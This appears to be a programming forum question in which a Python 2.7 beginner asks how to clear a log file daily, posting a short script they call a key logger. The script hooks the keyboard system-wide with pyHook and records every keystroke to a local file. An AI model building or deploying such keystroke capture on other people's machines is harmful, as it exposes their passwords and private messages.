# Python Script Execution Scheduling

Tags: python, date, scheduling

i'm new to python 2.7 and currently working on a scrip (Key Logger).
when i run the script it saves log file on a text file and i don't want to keep that logs forever :D
now i wanna know clean that text data (not file) **daily** with exciting **logger.py** script

```
    import pyHook
import pythoncom
import sys
import logging
file = open('e:\ myfile.dat', 'w')
file_log = "e:\ myfile.dat"

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10, chr(event.Ascii))
    return True
hook_manager = pyHook.HookManager()
hook_manager.KeyDown = OnKeyboardEvent
hook_manager.HookKeyboard()
pythoncom.PumpMessages()
```